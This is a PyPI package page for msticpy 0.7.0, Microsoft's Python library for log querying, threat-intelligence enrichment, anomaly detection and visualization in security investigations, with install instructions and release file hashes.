Skip to main content

MSTIC Security Tools

Project description

MSTIC Jupyter and Python Security Tools

Microsoft Threat Intelligence Python Security Tools.

msticpy is a library for InfoSec investigation and hunting in Jupyter Notebooks. It includes functionality to:

  • query log data from multiple sources
  • enrich the data with Threat Intelligence, geolocations and Azure resource data
  • extract Indicators of Activity (IoA) from logs and unpack encoded data
  • perform sophisticated analysis such as anomalous session detection and time series decomposition
  • visualize data using interactive timelines, process trees and multi-dimensional Morph Charts

It also includes some time-saving notebook tools such as widgets to set query time boundaries, select and display items from lists, and configure the notebook environment.

Timeline

The msticpy package was initially developed to support Jupyter Notebooks authoring for Azure Sentinel. While Azure Sentinel is still a big focus of our work, we are extending the data query/acquisition components to pull log data from other sources (currently Microsoft Defender and Microsoft Graph but we are actively working on support for data from other SIEM platforms). Most of the components can also be used with data from any source. Pandas DataFrames are used as the ubiquitous input and output format of almost all components.

The package addresses three central needs for security investigators and hunters:

  • Acquiring and enriching data
  • Analyzing data
  • Visualizing data

We welcome feedback, bug reports, suggestions for new features and contributions.

Installing

pip install msticpy

or for the latest dev build

pip install git+https://github.com/microsoft/msticpy

Documentation

Full documentation is at ReadTheDocs

Sample notebooks for many of the modules are in the docs/notebooks folder and accompanying notebooks.

You can also browse through the sample notebooks referenced at the end of this document to see some of the functionality used in context. You can play with some of the package functions in this interactive demo on mybinder.org.

Binder


Log Data Acquisition

  • QueryProvider - extensible query library targeting Azure Sentinel, OData sources and other. Built-in parameterized queries allow complex queries to be run from a single function call. Add your own queries using a simple YAML schema.
  • security_alert and security_event - encapsulation classes for alerts and events.
  • entity_schema - definitions for multiple entities (Host, Account, File, IPAddress, etc.)

Data Queries Notebook

Data Enrichment

tiproviders

The TILookup class can lookup IoCs across multiple TI providers. built-in providers include AlienVault OTX, IBM XForce, VirusTotal and Azure Sentinel.

The input can be a single IoC observable or a pandas DataFrame containing multiple observables. Depending on the provider, you may require an account and an API key. Some providers also enforce throttling (especially for free tiers), which might affect performing bulk lookups.

TIProviders and TILookup Usage Notebook

GeoLocation Data

The GeoIP lookup classes allow you to match the geo-locations of IP addresses using either:

Folium map

GeoIP Lookup and GeoIP Notebook

Azure Data

This package contains functionality for enriching data regarding Azure host details with additional host details exposed via the Azure API.

Azure Data

Security Analysis

This subpackage contains several modules helpful for working on security investigations and hunting:

Anomalous Sequence Detection

Detect unusual sequences of events in your Office, Active Directory or other log data. You can extract sessions (e.g. activity initiated by the same account) and identify and visualize unusual sequences of activity. For example, detecting an attacker setting a mail forwarding rule on someone's mailbox.

Anomalous Sessions and Anomalous Sequence Notebook

Time Series

Time series analysis allows you to identify unusual patterns in your log data taking into account normal seasonal variations (e.g. the regular ebb and flow of events over hours of the day, days of the week, etc.). Using both analysis and visualization highlights unusual traffic flows or event activity for any data set.

Time Series anomalies

Time Series

base64unpack

Base64 and archive (gz, zip, tar) extractor. It will try to identify any base64 encoded strings and try decode them. If the result looks like one of the supported archive types it will unpack the contents. The results of each decode/unpack are rechecked for further base64 content and up to a specified depth.

Base64 Decoding Base64Unpack Notebook

iocextract

Uses regular expressions to look for Indicator of Compromise (IoC) patterns - IP Addresses, URLs, DNS domains, Hashes, file paths. Input can be a single string or a pandas dataframe.

IoC Extraction IoCExtract Notebook

eventcluster (experimental)

This module is intended to be used to summarize large numbers of events into clusters of different patterns. High volume repeating events can often make it difficult to see unique and interesting items.

Clustering

This is an unsupervised learning module implemented using SciKit Learn DBScan.

Event Clustering Event Clustering Notebook

Visualization

Timelines

Display any log events on an interactive timeline. Using the Bokeh Visualization Library the timeline control enables you to visualize one or more event streams, interactively zoom into specific time slots and view event details for plotted events.

Timeline

Timeline Timeline Notebook

Process Trees

The process tree functionality has two main components:

  • Process Tree creation - taking a process creation log from a host and building the parent-child relationships between processes in the data set.
  • Process Tree visualization - this takes the processed output displays an interactive process tree using Bokeh plots.

There are a set of utility functions to extract individual and partial trees from the processed data set.

Process Tree

Process Tree Process Tree Notebook

Other Tools

auditdextract

Module to load and decode Linux audit logs. It collapses messages sharing the same message ID into single events, decodes hex-encoded data fields and performs some event-specific formatting and normalization (e.g. for process start events it will re-assemble the process command line arguments into a single string).

This is still a work-in-progress.

syslog_utils

Module to support an investigation of a Linux host with only syslog logging enabled. This includes functions for collating host data, clustering logon events and detecting user sessions containing suspicious activity.

cmd_line

A module to support he detection of known malicious command line activity or suspicious patterns of command line activity.

Notebook widgets

These are built from the Jupyter ipywidgets collection and group common functionality useful in InfoSec tasks such as list pickers, query time boundary settings and event display into an easy-to-use format.

Time span Widget

Alert browser


Clone the notebooks in this repo to Azure Notebooks

Requires sign-in to Azure Notebooks

More Notebooks

View directly on GitHub or copy and paste the link into nbviewer.org

Notebook examples with saved data

See the following notebooks for more examples of the use of this package in practice:

Supported Platforms and Packages


Contributing

For (brief) developer guidelines, see this wiki article Contributor Guidelines

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.microsoft.com.

When you submit a pull request, a CLA-bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

Project details


Release history Release notifications | RSS feed

This version

0.7.0

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

msticpy-0.7.0.tar.gz (239.3 kB view details)

Uploaded Source

Built Distribution

msticpy-0.7.0-py3-none-any.whl (301.8 kB view details)

Uploaded Python 3

File details

Details for the file msticpy-0.7.0.tar.gz.

File metadata

  • Download URL: msticpy-0.7.0.tar.gz
  • Upload date:
  • Size: 239.3 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.2.0 pkginfo/1.5.0.1 requests/2.24.0 setuptools/47.1.0 requests-toolbelt/0.9.1 tqdm/4.48.2 CPython/3.7.8

File hashes

Hashes for msticpy-0.7.0.tar.gz
Algorithm Hash digest
SHA256 a32837e13eab9924ab02c339f1d28965da8ba7aae7886112a2b0dca09e53f4da
MD5 04187e52207c57c18cd1e8853ec8a2e9
BLAKE2b-256 3479b22001ef3c3755c63b6dc0ace841bc5bb2566d8d7315054602bb4fcce2d8

See more details on using hashes here.

File details

Details for the file msticpy-0.7.0-py3-none-any.whl.

File metadata

  • Download URL: msticpy-0.7.0-py3-none-any.whl
  • Upload date:
  • Size: 301.8 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.2.0 pkginfo/1.5.0.1 requests/2.24.0 setuptools/47.1.0 requests-toolbelt/0.9.1 tqdm/4.48.2 CPython/3.7.8

File hashes

Hashes for msticpy-0.7.0-py3-none-any.whl
Algorithm Hash digest
SHA256 1688df61c5df04a2e5c28ff5f035b9aa9a13efe9dd20b38054c46ed1a7fa8584
MD5 9665d1c1a2ee020293813acd6eaa9fbc
BLAKE2b-256 e7d48f8d42e69960ede7f1bf711c70ca871bbb00458a3ac90d1b5819462f29ff

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page